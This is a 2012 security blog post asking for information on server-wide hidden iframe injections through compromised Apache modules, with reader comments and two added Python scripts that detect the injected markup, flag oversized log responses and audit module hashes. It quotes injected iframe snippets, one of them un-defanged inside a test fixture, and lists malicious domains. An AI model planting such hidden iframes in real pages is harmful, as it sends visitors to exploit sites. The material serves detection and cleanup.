
RFI: Server-wide iframe injections

   13 Aug 12   Filed in Short Attack Reviews

This post is a request for information.

This summer I came across several clearly infected servers where I couldn't figure out exactly how the hack works, what should be done to clean them up, or how to protect other servers from similar hacks. So I decided to share what I know about the issue and hope someone can shed some light on it.

1. The malicious code typically looks like this (this is what I see today, August 13, 2012):

<style>.vn5u66dxa { position:absolute; left:-1023px; top:-1209px} </style> <div class="vn5u66dxa"><if rame src="hxxp://insitudrill .com/46814443.html" width="199" height="288"></ifra me></div>

About a month ago the iframe URLs looked slightly different:

<style>.um6x1zsq { position:absolute; left:-1241px; top:-1283px} </style> <div><ifr ame src="hxxp://megaworlsnetscapes .info/?a=YWZmaWQ9MDUyODg=" width="120" height="300"></ifram e></div>

The code changes on every page load: the class name, the negative left/top offsets, the iframe domain and path, and the width/height values are randomized (these were the parts shown in bold).

2. This code is being injected into random (or not so random) places in the <head> section of the HTML code.

3. It is being injected into both PHP pages and into static plain HTML pages.

4. Strictly speaking, we should be talking about infected server responses, since the malicious code cannot be found in any website files.

5. It is pretty hard to detect this infection since only random server responses are affected. There must be some internal conditions (which I couldn't figure out yet), since Unmask Parasites has a quite high detection rate (still not always) while other tools (e.g. wget or online HTTP tools) rarely trigger this malware for the same requests. I couldn't reproduce the malicious responses in real browsers at all.

[Screenshot: detection in Unmask Parasites]

6. At the same time, Google's malware scanners do detect those iframes. However, their detection rate is not perfect either: Google unblocks sites where I can still see those malicious iframes.

7. This hack typically affects all sites on the same server. However it’s hard to tell for sure because of its intermittent nature and less than perfect detection rate.

8. This hack (in my experience) affects servers powered by Apache.

9. If you check Apache access logs, you can recognize tampered responses: their size (the bytes-sent field) is slightly bigger than the typical response size for the same page, by roughly the length of the injected snippet (under 200 bytes for the samples above).

10. Domains in iframe URLs also change every day or so. However I couldn’t detect the event that triggers the change.

11. Here's a list (incomplete) of domains associated with this attack.

  • judochatoutsiderugs .info
  • electroniccastingbankingetc .info
  • insitudrill .com
  • megaworlsnetscapes .info
  • megaworlsnetscapes .net
  • mig-generatio-nla-bss .info
  • mikao-usui-reikimaster-annet .nl
  • fuellttropasen .net
  • inwocementworld .net
  • blondbindsfeeds .org
  • mainsbigwoeld .net
  • jurymerlin .info
  • worldorgsrooms .net
  • worldorgsrooms .com
  • lawpeter .info
  • linesphones .info
  • signaccelerated .org
  • qmg2 .com
  • dorcel3d .fr

12. Some information about what those iframes do. Currently they redirect to hxxp://multiplechoicetaping .org/feed/xml.php?uid=45

I checked the final landing pages some time ago and found various browser exploits there. For example this: VirusTotal 9/42.

And by the way, the “YWZmaWQ9MDUyODg=” part of the URL is base64 for “affid=05288”: criminals like affiliate marketing.
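Two of the observations above (points 1 and 9) translate directly into checks a webmaster can run without server access: a scanner for the off-screen style + iframe pattern in a fetched page (with the base64 affiliate parameter decoded), and a pass over an Apache access log that flags responses slightly larger than the usual size for the same URL. The script below is an added example, not code from the original post or from Unmask Parasites; the HTML page and the log lines it runs on are constructed for the demo (the 203.0.113.0/24 addresses and byte counts are made up; the injected fragment is modelled on the second sample in the post).

```python
"""Two checks for the server-wide iframe injection described in the post.

Added example, not code from the post. SAMPLE_HTML and SAMPLE_LOG are
constructed test data, modelled on the snippets in the post.
  1. find_injected_iframes(): a <style> rule that pushes a class far
     off-screen, followed closely by an <iframe>; base64 query values
     (the affid trick) are decoded.
  2. oversized_responses(): 200 responses grouped by path, flagged when a
     little larger than the most common size for that path.
"""
import base64
import binascii
import re
from collections import Counter, defaultdict
from urllib.parse import unquote, urlsplit

# e.g. <style>.vn5u66dxa { position:absolute; left:-1023px; top:-1209px} </style>
STYLE_RE = re.compile(
    r"<style>\s*\.([\w-]+)\s*\{[^}]*position\s*:\s*absolute[^}]*"
    r"left\s*:\s*(-?\d+)px[^}]*top\s*:\s*(-?\d+)px[^}]*\}\s*</style>",
    re.I,
)
IFRAME_RE = re.compile(r"<iframe\s[^>]*\bsrc=[\"']([^\"']+)[\"']", re.I)


def decode_b64_params(url):
    """Map query parameter -> decoded text for values that are valid base64
    and decode to printable ASCII (a=YWZmaWQ9MDUyODg= -> affid=05288)."""
    out = {}
    for pair in urlsplit(url).query.split("&"):
        name, sep, value = pair.partition("=")
        if not sep:
            continue
        try:
            raw = base64.b64decode(unquote(value), validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw and all(32 <= b < 127 for b in raw):
            out[name] = raw.decode("ascii")
    return out


def find_injected_iframes(html, min_offset=500, window=800):
    """Return one record per iframe found within `window` characters after
    an off-screen style block (|left| or |top| >= min_offset px). The
    injected fragment is contiguous, so looking right after the style
    catches both variants in the post (div with the class, bare div).
    Legitimate off-screen CSS followed by an iframe would also be
    reported: treat hits as leads to review, not as proof."""
    hits = []
    for m in STYLE_RE.finditer(html):
        cls, left, top = m.group(1), int(m.group(2)), int(m.group(3))
        if max(abs(left), abs(top)) < min_offset:
            continue
        for f in IFRAME_RE.finditer(html, m.end(), m.end() + window):
            src = f.group(1)
            hits.append({"class": cls, "left": left, "top": top,
                         "src": src, "params": decode_b64_params(src)})
    return hits


# Apache common/combined log format; the size field is %b, body bytes sent
# ("-" when no body was sent, e.g. a 304).
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def oversized_responses(log_lines, min_delta=100, max_delta=500):
    """Per path, take the most common size of 200 responses as the clean
    baseline (only a minority of responses are tampered) and flag lines
    that exceed it by min_delta..max_delta bytes, i.e. by about the length
    of the injected snippet. Only meaningful for pages whose size is
    otherwise stable (static HTML, cached CMS output)."""
    sizes, rows = defaultdict(list), []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m.group("status") != "200" or m.group("size") == "-":
            continue
        size = int(m.group("size"))
        sizes[m.group("path")].append(size)
        rows.append((m.group("path"), size))
    baseline = {p: Counter(s).most_common(1)[0][0] for p, s in sizes.items()}
    flagged = []
    for path, size in rows:
        delta = size - baseline[path]
        if min_delta <= delta <= max_delta:
            flagged.append((path, baseline[path], size, delta))
    return flagged


SAMPLE_HTML = (  # constructed page, modelled on the post's second sample
    "<html><head><title>t</title><script src='/js/site.js'></script>"
    "<style>.um6x1zsq { position:absolute; left:-1241px; top:-1283px} </style> "
    '<div class="um6x1zsq"><iframe src="http://megaworlsnetscapes.info/?a=YWZmaWQ9MDUyODg="'
    ' width="120" height="300"></iframe></div></head><body>hello</body></html>'
)
SAMPLE_LOG = [  # constructed lines; one /index.html response is 181 bytes larger
    '203.0.113.5 - - [13/Aug/2012:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [13/Aug/2012:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Aug/2012:10:02:41 +0000] "GET /index.html HTTP/1.1" 200 4301 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [13/Aug/2012:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [13/Aug/2012:10:03:15 +0000] "GET /about.html HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [13/Aug/2012:10:03:16 +0000] "GET /about.html HTTP/1.1" 304 - "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_injected_iframes(SAMPLE_HTML):
        print("hidden iframe:", hit)
    for row in oversized_responses(SAMPLE_LOG):
        print("oversized response: path=%s baseline=%d size=%d (+%d)" % row)
```

Because the injection is intermittent, the HTML check has to be run against many fetches of the same page, not one; the log check is the cheaper way to find the tampered responses after the fact, and the flagged timestamps tell you which requests to correlate with other server logs.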

Your ideas are welcome

Given all the information I have, I can only think of a hack that involves hijacking the Apache process: either a “patched” Apache binary or one of its modules, or some malicious process that intercepts the generated web page code and injects the iframes into it.

A few years ago I reviewed two server-wide attacks that managed to hijack Apache: GoScanPark and Beladen. This time the symptoms are not exactly the same, but during the last three years this attack might have evolved. Or it could be something completely different.

As far as I can tell, quite a few servers around the world are infected, and I hope some server admins have already figured out how the hackers managed to infect their servers and what should be done to efficiently detect the hack and clean up web servers.

Please share whatever information/thoughts/ideas you have. It may make a difference and help harden and clean up many infected and potentially vulnerable servers. Thank you!

Update (August 15, 2012): Sucuri follows up on this post with more of the iframe URLs involved and some speculation about the attack vector (they think it is a “mix of attacks”). Still no information about how it works and what exactly is infected.

Update (September 10, 2012): I have new information about this attack. It turns out the servers are compromised at the root level, and the hackers managed to install malicious Apache modules.
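Once the injection is known to come from a malicious Apache module, the check an administrator wants is an integrity audit of the modules directory and of every LoadModule line. The script below is an added example, not code from the post; it assumes (the post names neither paths nor tools) that modules live in one directory (e.g. /usr/lib/apache2/modules on Debian, /etc/httpd/modules on RHEL), that relative LoadModule paths resolve against a ServerRoot that is the parent of that directory, and that you have a baseline of "sha256  filename" lines recorded from a clean install (sha256sum *.so > baseline.txt) or rebuilt from the distribution package on a trusted machine. build_demo_tree() creates a constructed fixture (fake .so files, a hypothetical mod_unknown.so, a made-up baseline) so the script runs stand-alone.

```python
"""Audit Apache's on-disk modules and LoadModule directives against a
known-good baseline. Added example, not from the post; paths, baseline
format and the ServerRoot rule are assumptions described in the lead-in."""
import hashlib
import re
import tempfile
from pathlib import Path

# LoadModule <name> <file>; the file may be quoted, absolute or ServerRoot-relative
LOADMODULE_RE = re.compile(r'^\s*LoadModule\s+(\S+)\s+"?([^"\s]+)"?', re.M)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def read_baseline(path):
    """Parse sha256sum-style 'hash  filename' lines into {basename: hash}."""
    base = {}
    for line in Path(path).read_text().splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2:
            base[Path(parts[1].strip().lstrip("*")).name] = parts[0].lower()
    return base


def audit_modules(modules_dir, baseline_path, config_paths):
    """Return (finding, detail) tuples: hash_mismatch / module_not_in_baseline
    for .so files on disk, loadmodule_outside_modules_dir /
    loadmodule_file_not_in_baseline for LoadModule lines in the configs."""
    modules_dir = Path(modules_dir).resolve()
    baseline = read_baseline(baseline_path)
    findings = []
    for so in sorted(modules_dir.glob("*.so")):
        expected = baseline.get(so.name)
        if expected is None:
            findings.append(("module_not_in_baseline", str(so)))
        elif expected != sha256_file(so):
            findings.append(("hash_mismatch", str(so)))
    for cfg in config_paths:
        text = Path(cfg).read_text(errors="replace")
        for name, target in LOADMODULE_RE.findall(text):
            p = Path(target)
            if not p.is_absolute():
                p = modules_dir.parent / target  # ServerRoot assumption (see lead-in)
            p = p.resolve()
            if modules_dir not in p.parents:
                findings.append(("loadmodule_outside_modules_dir", f"{name} {target}"))
            elif p.name not in baseline:
                findings.append(("loadmodule_file_not_in_baseline", f"{name} {target}"))
    return findings


def build_demo_tree():
    """Constructed fixture: three fake .so files (one clean, one whose bytes
    differ from the baseline, one hypothetical mod_unknown.so that no
    baseline knows), a baseline, and a config that also loads a module
    from outside the modules directory. Returns (modules_dir, baseline, [cfg])."""
    root = Path(tempfile.mkdtemp(prefix="apache-audit-"))
    mods = root / "modules"
    mods.mkdir()
    (mods / "mod_rewrite.so").write_bytes(b"clean rewrite module")
    (mods / "mod_ssl.so").write_bytes(b"ssl module, replaced on disk")
    (mods / "mod_unknown.so").write_bytes(b"not in any package")
    baseline = root / "baseline.txt"
    baseline.write_text(
        f"{hashlib.sha256(b'clean rewrite module').hexdigest()}  mod_rewrite.so\n"
        f"{hashlib.sha256(b'ssl module, original').hexdigest()}  mod_ssl.so\n")
    cfg = root / "httpd.conf"
    cfg.write_text(
        "LoadModule rewrite_module modules/mod_rewrite.so\n"
        'LoadModule ssl_module "modules/mod_ssl.so"\n'
        "LoadModule unknown_module modules/mod_unknown.so\n"
        f"LoadModule foo_module {root / 'elsewhere' / 'mod_foo.so'}\n")
    return str(mods), str(baseline), [str(cfg)]


if __name__ == "__main__":
    mods, baseline, cfgs = build_demo_tree()
    for kind, detail in audit_modules(mods, baseline, cfgs):
        print(f"{kind}: {detail}")
```

On a real host, compare the result with `apachectl -M` (the modules actually loaded) and with the package manager's own verification (`dpkg --verify apache2-bin` or `debsums`, `rpm -V httpd`). Because the post says these servers are compromised at root level, run the hashing from a rescue boot or against a copy of the disk: a tampered host's own binaries, including sha256sum and the package database, cannot be trusted to report honestly.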

To webmasters

If Google reports similar iframes on your site (you can usually see the code in Webmaster Tools -> Health -> Malware), then most likely this is something only your hosting provider can take care of. Let them know about the problem and show them this article. If you don't get much help from your hosting provider, you might want to move your site to a different server.


Reader's Comments (10)

  1.

    Can you verify whether these servers still allow 777 permissions (non-suPHP type servers)?

    Other common denominators like PHP version or Apache version?

    Thanks,
    Jim

  2.

    Since the hack affects all sites on the server, it is worth looking at the server itself.

    Is a control panel (cPanel, Plesk, webmin, etc) used?

    Are the affected sites user directories all writable by one user (apache?) or multiple users? This distinguishes between a root compromised server, and some other random Apache level compromise.

    Are there FTP logs for the changed pages? How about Apache access logs at the time of the change?

  3.

    http://en.wikipedia.org/wiki/HTTP_response_splitting maybe?

  4.

    Jim, Eric,

    I usually don’t have access to server internals. And most of those servers don’t disclose versions of Apache and PHP.

    I worked with one dedicated server where there were only a handful of sites that belonged to the server owner and developed specifically for him (e.g. no third-party CMS or scripts were used).

    But I can also see the same problems on shared servers and I can see the iframes in most sites that I check (remember the detection is not consistent) and I can see it in static web pages and in CMS-generated pages.

    I checked Apache access logs but couldn't find anything that looked like a request to a backdoor that would trigger a change in the iframe URL. However, that was the dedicated server, and it produces hundreds of megabytes of logs every day, and this site extensively uses POST requests to multiple pages, so I could easily have missed something. I also scanned the website files for known backdoor patterns and didn't find anything (I wish all webmasters used version or integrity control, especially on dedicated servers, so that spotting changes would be really easy). So I guess it could be something on the Apache level.

    I don’t remember seeing FTP logs there (they probably only worked via SFTP).

    I hope administrators of affected servers will see this article and will be able to answer the rest of the questions.

    P.S. If someone wants to see an infected server, contact me and I’ll send you an IP address (If I can still see the iframes there by that time)

  5.

    Hi Guy,
    “eshopcoupons .com” was hit with the following malware code injected in most of our javascript files…..

    (Edit by Denis: I moved your code to Pastebin) http://pastebin.com/N2mrrfZ3

    Not sure how it got there, but we took the following actions and it hasn't returned for more than 24 hours…

    - Changed all passwords (admin, FTP users)
    - Used .htaccess to block all IP addresses that look suspicious (most of them are from the Russian Federation, Ukraine, and Romania)
    - Removed write permission on all java files

    Question:
    Should I block all IP addresses that are not coming from the US and Canada? This website has nothing to do with people from China, the Russian Federation, Ukraine, Romania etc. What are the chances that major search engine bots are from these countries?

    Is there anything else I can do to prevent this happening again ?
    This site is run on Apache, hosted by godaddy share plan.

    •

      Hi.

      This code injects an invisible iframe from “hxxp://www.minnepark .be/forum.php”, but I doubt it has anything to do with the attack described here.
      In your case you should find the security hole rather than blindly blocking users. Most likely there are backdoors on your server.

      P.S. It would be better to discuss this elsewhere. I'll be removing off-topic comments from this thread.

  6.

    Hi, thanks for all this information. My site got hacked a few days back, and I was scratching my head, trying to figure out the malware PHP script. But (as you've said) I couldn't find any. Then I googled your site and was kind of relieved after reading this. Right now I've taken this matter to my host.

    And, I think, the code is injected after the first <script> tag under the <head>. This behaviour again made me think: is it a JavaScript which attaches the code after the first script tag? But, I guess, it is not. The code itself is getting injected right inside the head, after the first script.

  7.

    btw, the injection, I guess, exploits a recent vulnerability in Java. https://blogs.oracle.com/security/entry/security_alert_for_cve_20121

    It downloads and runs a fake antivirus (which under Windows 7 looks just like the Action Center). Although Microsoft Security Essentials has successfully detected and stopped it from the very beginning, I guess.

  8.

    Same here, just got infected, and a couple of partners too, all using PLESK. There has to be something in Apache that replaces the content of the first JavaScript file; that JS injects the iframe. Still searching for that freaking module; all the modules are legit… so one of them has to have been replaced.

  9.

    [...] the malware was [...] by the Russian malware researcher Denis Sinegubko, who [...] about it in his blog [...]